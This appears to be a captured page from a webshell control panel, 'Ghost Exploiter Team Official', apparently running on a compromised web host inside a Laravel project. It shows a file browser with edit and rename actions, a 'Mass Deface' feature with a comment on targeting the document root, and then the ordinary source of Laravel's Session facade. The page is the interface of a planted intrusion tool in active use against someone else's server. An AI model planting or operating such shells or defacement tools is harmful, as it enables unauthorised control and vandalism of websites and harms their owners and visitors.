webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Support
/
Facades
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
App.php
8.31KB
edt
ren
Artisan.php
1.527KB
edt
ren
Auth.php
4.969KB
edt
ren
Blade.php
2.89KB
edt
ren
Broadcast.php
2.283KB
edt
ren
Bus.php
4.722KB
edt
ren
Cache.php
3.754KB
edt
ren
Config.php
0.868KB
edt
ren
Cookie.php
2.392KB
edt
ren
Crypt.php
0.701KB
edt
ren
DB.php
7.467KB
edt
ren
Date.php
5.34KB
edt
ren
Event.php
4.695KB
edt
ren
Facade.php
8.754KB
edt
ren
File.php
3.802KB
edt
ren
Gate.php
2.733KB
edt
ren
Hash.php
1.352KB
edt
ren
Http.php
9KB
edt
ren
Lang.php
2.077KB
edt
ren
Log.php
2.673KB
edt
ren
Mail.php
4.847KB
edt
ren
Notification.php
3.76KB
edt
ren
ParallelTesting.php
1.223KB
edt
ren
Password.php
1.981KB
edt
ren
Pipeline.php
1.229KB
edt
ren
Process.php
4.035KB
edt
ren
Queue.php
4.608KB
edt
ren
RateLimiter.php
1.067KB
edt
ren
Redirect.php
2.299KB
edt
ren
Redis.php
1.99KB
edt
ren
Request.php
10.621KB
edt
ren
Response.php
2.736KB
edt
ren
Route.php
8.046KB
edt
ren
Schema.php
3.181KB
edt
ren
Session.php
3.521KB
edt
ren
Storage.php
7.498KB
edt
ren
URL.php
3.619KB
edt
ren
Validator.php
1.539KB
edt
ren
View.php
5.401KB
edt
ren
Vite.php
1.847KB
edt
ren
<?php namespace Illuminate\Support\Facades; /** * @method static bool shouldBlock() * @method static string|null blockDriver() * @method static int defaultRouteBlockLockSeconds() * @method static int defaultRouteBlockWaitSeconds() * @method static array getSessionConfig() * @method static string getDefaultDriver() * @method static void setDefaultDriver(string $name) * @method static mixed driver(string|null $driver = null) * @method static \Illuminate\Session\SessionManager extend(string $driver, \Closure $callback) * @method static array getDrivers() * @method static \Illuminate\Contracts\Container\Container getContainer() * @method static \Illuminate\Session\SessionManager setContainer(\Illuminate\Contracts\Container\Container $container) * @method static \Illuminate\Session\SessionManager forgetDrivers() * @method static bool start() * @method static void save() * @method static void ageFlashData() * @method static array all() * @method static array only(array $keys) * @method static array except(array $keys) * @method static bool exists(string|array $key) * @method static bool missing(string|array $key) * @method static bool has(string|array $key) * @method static mixed get(string $key, mixed $default = null) * @method static mixed pull(string $key, mixed $default = null) * @method static bool hasOldInput(string|null $key = null) * @method static mixed getOldInput(string|null $key = null, mixed $default = null) * @method static void replace(array $attributes) * @method static void put(string|array $key, mixed $value = null) * @method static mixed remember(string $key, \Closure $callback) * @method static void push(string $key, mixed $value) * @method static mixed increment(string $key, int $amount = 1) * @method static int decrement(string $key, int $amount = 1) * @method static void flash(string $key, mixed $value = true) * @method static void now(string $key, mixed $value) * @method static void reflash() * @method static void keep(array|mixed $keys = null) * @method static void flashInput(array $value) * @method static mixed remove(string $key) * @method static void forget(string|array $keys) * @method static void flush() * @method static bool invalidate() * @method static bool regenerate(bool $destroy = false) * @method static bool migrate(bool $destroy = false) * @method static bool isStarted() * @method static string getName() * @method static void setName(string $name) * @method static string getId() * @method static void setId(string|null $id) * @method static bool isValidId(string|null $id) * @method static void setExists(bool $value) * @method static string token() * @method static void regenerateToken() * @method static string|null previousUrl() * @method static void setPreviousUrl(string $url) * @method static void passwordConfirmed() * @method static \SessionHandlerInterface getHandler() * @method static \SessionHandlerInterface setHandler(\SessionHandlerInterface $handler) * @method static bool handlerNeedsRequest() * @method static void setRequestOnHandler(\Illuminate\Http\Request $request) * @method static void macro(string $name, object|callable $macro) * @method static void mixin(object $mixin, bool $replace = true) * @method static bool hasMacro(string $name) * @method static void flushMacros() * * @see \Illuminate\Session\SessionManager */ class Session extends Facade { /** * Get the registered name of the component. * * @return string */ protected static function getFacadeAccessor() { return 'session'; } }